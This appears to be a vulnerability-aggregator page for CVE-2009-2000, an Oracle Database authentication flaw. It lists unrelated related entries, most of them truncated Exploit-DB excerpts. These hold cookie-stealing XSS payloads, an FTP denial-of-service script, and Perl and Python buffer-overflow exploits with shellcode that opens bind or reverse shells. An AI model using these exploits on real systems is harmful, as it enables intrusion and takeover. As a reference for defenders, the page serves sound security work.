CVE-2009-2000
published 2009-10-22CVE-2009-2000: Unspecified vulnerability in the Authentication component in Oracle Database 11.1.0.7 allows remote attackers to affect confidentiality via unknown vectors.
PriorityP427medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
2.71%
84.5th percentile
Unspecified vulnerability in the Authentication component in Oracle Database 11.1.0.7 allows remote attackers to affect confidentiality via unknown vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | database_server | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat4.3MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p67h-5cwv-hq8r: Unspecified vulnerability in the Authentication component in Oracle Database 11
ghsa_unreviewed·2022-05-02
CVE-2009-2000 [MEDIUM] GHSA-p67h-5cwv-hq8r: Unspecified vulnerability in the Authentication component in Oracle Database 11
Unspecified vulnerability in the Authentication component in Oracle Database 11.1.0.7 allows remote attackers to affect confidentiality via unknown vectors.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
CVE-2009-1349: Cross-site scripting (XSS) vulnerability in C2Net Stronghold 2
vendor_redhat·CVSS 4.3
CVE-2009-1349 [MEDIUM] CVE-2009-1349: Cross-site scripting (XSS) vulnerability in C2Net Stronghold 2
Cross-site scripting (XSS) vulnerability in C2Net Stronghold 2.3 allows remote attackers to inject arbitrary web script or HTML via the URI.
Statement: This flaw was caused by a C2Net specific patch added to Apache http_log.c in Stronghold 2.3.
C2Net Stronghold 2.3 reached end of life for updates on October 31st 2000.
http://www.awe.com/mark/history/stronghold.html
No detection rules found.
Exploit-DB
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
exploitdb·2010-05-11·CVSS 9.3
CVE-2010-0816 [CRITICAL] Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
---
Application: Microsoft Outlook Express
Microsoft Windows Mail
Platforms: Windows 2000
Windows XP
Windows Vista
Windows server 2003
Windows Server 2008 SR2
Exploitation: Remote Exploitable
CVE Number: CVE-2010-0816
Discover Date: 2009-09-11
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code
#####################################################################################
1) Introduction
Windows Mail is an e-mail and newsgroup client included in Windows Vista, that was superseded by Wind
Exploit-DB
phpAuction - Cross-Site Scripting
exploitdb·2009-12-26
phpAuction - Cross-Site Scripting
phpAuction - Cross-Site Scripting
---
| # Title : PHPAUCTION Cross Site Scripting Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # DAte :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : Copyright 2000-2009, PHPAUCTION.ORG |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1-http://localhost/phpauction/register.php?TPL_name=1>">alert(213771818860)%3B&TPL_nick=indoushka&[email protected]&[email protected]
Exploit-DB
XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
exploitdb·2009-11-24
CVE-2009-4108 XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
---
Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: Dxmsoft
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server failed to handle more than 2000 files or folders in
the root directory.
Details:
if you could log on the server, take the following steps and the server will
crash which lead to DoS.
1.upload 2000 files or folders.
2.close the current connection.
3.use a ftp client to reconnect the server.
user ...
pass ...
port ...
list ...
crash!!!!!!
Exploit example:
1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py \n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous
Exploit-DB
Cisco VPN Client - Integer Overflow Denial of Service
exploitdb·2009-11-21
CVE-2009-4118 Cisco VPN Client - Integer Overflow Denial of Service
Cisco VPN Client - Integer Overflow Denial of Service
---
/*
Cisco VPN client version 5.0.03.0560
Cisco VPN client Version 5.0.04.0300
Cisco VPN client Version 5.0.05.0290
Cisco VPN client Version 4.8.02.0010
*/
/*
* Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code
*
* By Alex Hernandez aka alt3kx (c) November 2009
*
* This POC is only for test. If an application read a malformed chars
* file like this POC, the application will be crashed.
*
* We tested this code on:
*
* Windows Vista Bussines SP1 Spanish
* Windows Vista Home Premium SP1 English
* Windows 2000 Server English
* Windows XP Professional SP3
*
* Cisco VPN client version 5.0.03.0560
* Cisco VPN client Version 5.0.04.0300
* Cisco VPN client Version 5.0.05.0290
* Cisco VPN client Version 4.8.02.0010
*
* Compi
Exploit-DB
Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting
exploitdb·2009-10-15
CVE-2009-4554 Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting
Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/36710/info
Snitz Forums 2000 is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Snitz Forums 2000 3.4.07 is vulnerable; other versions may also be affected.
[sound]http://www.example.com"
onLoad="alert(document.cookie)[/sound]
Exploit-DB
Snitz Forums 2000 3.4.7 - 'pop_send_to_friend.asp?url' Cross-Site Scripting
exploitdb·2009-10-15
CVE-2009-4554 Snitz Forums 2000 3.4.7 - 'pop_send_to_friend.asp?url' Cross-Site Scripting
Snitz Forums 2000 3.4.7 - 'pop_send_to_friend.asp?url' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/36710/info
Snitz Forums 2000 is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Snitz Forums 2000 3.4.07 is vulnerable; other versions may also be affected.
http://www.example.com/forum/pop_send_to_friend.asp?url=
Exploit-DB
Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2009-10-15
CVE-2009-4554 Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities
Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities
---
Application: Snitz Forums 2000
Version affected: 3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
###### PERMANENT XSS
If [sound] tag is allowed:
[sound]http://url_to_valid_mp3_or_m3u_file.m3u";
onLoad="alert(document.cookie)[/sound]
######
###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=
Note the space: onLoad="alert(document.cookie)"
######
Exploit-DB
Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow
exploitdb·2009-09-01
CVE-2009-1643 Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow
Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# Soritong MP3 Player 1.0 (.m3u//UI.txt) Universal Local BOF (SEH)
###############################################################################
# Original exploit:::http://www.milw0rm.com/exploits/8624
# by Stack
####(m3u file)#################################################################
my $bof="\x41" x 260;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x47\x30\x01\x10";##Player.dll
my $nop="\x90" x 2000;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x
Exploit-DB
Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow
exploitdb·2009-09-01
CVE-2009-3023 Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow
Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow
---
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x
Exploit-DB
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow
exploitdb·2009-08-31
CVE-2009-3023 Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow
---
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x3
Exploit-DB
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
exploitdb·2009-08-24
CVE-2009-0490 Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
---
#!/usr/bin/env python
#
# Audacity
print " [+] Creating eviL .gro file..."
buff = ("\x44" * 174)
buff += ("\xEB\x08\x90\x90")
buff += ("\x22\x23\x17\x01")
buff += "\x90"* 4
buff += ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x57\x30\x30\x54" # this is the egg...
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buff += ("\xCC" * 1000);
buff += "W00TW00T"
# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)
buff += ("\x89\xe5\xd9\xc3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4
Exploit-DB
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
exploitdb·2009-02-02
CVE-2009-1808 Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
---
// source: https://www.securityfocus.com/bid/35120/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
#include
int main()
{
WCHAR c[1000] = {0};
memset(c, �c�, 1000);
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
WCHAR b[1000] = {0};
SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
return 0;
}
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
exploitdb·2009-01-27
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
---
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE) Buffer Overflow PoC
my $chars="\x90" x 2000;
open(MYFILE,'>>hakxer.pls');
print MYFILE $chars;
close(MYFILE);
print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";
# milw0rm.com [2009-01-27]
Exploit-DB
WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow
exploitdb·2009-01-26
CVE-2009-0351 WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow
WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow
---
#!/usr/bin/perl
#
# WinFTP 2.3.0 post-auth remote exploit. (www.wftpserver.com)
#
################################################################################
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl #
# #
# Usage: winftp-remote.pl #
# #
# Target: 1 -> Win2k #
# Target: 2 -> WinXP sp2/3 (DoS only) #
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl 10.0.0.5 user1 pass1 1 #
# #
# [=] Connected. #
# [=] Sending user user1 #
# [=] Sending pass pass1 #
# [=] Sending payload... #
# [=] Done. You should have a command shell on port 7777. #
# #
# root@halcyon:~/Exploits/WinFTP# nc 10.0.0.5 7777 #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-1999 Microsoft Corp. #
# #
#
http://secunia.com/advisories/37027http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.htmlhttp://www.securityfocus.com/bid/36756http://www.securitytracker.com/id?1023057http://www.us-cert.gov/cas/techalerts/TA09-294A.htmlhttp://secunia.com/advisories/37027http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.htmlhttp://www.securityfocus.com/bid/36756http://www.securitytracker.com/id?1023057http://www.us-cert.gov/cas/techalerts/TA09-294A.html
2009-10-22
Published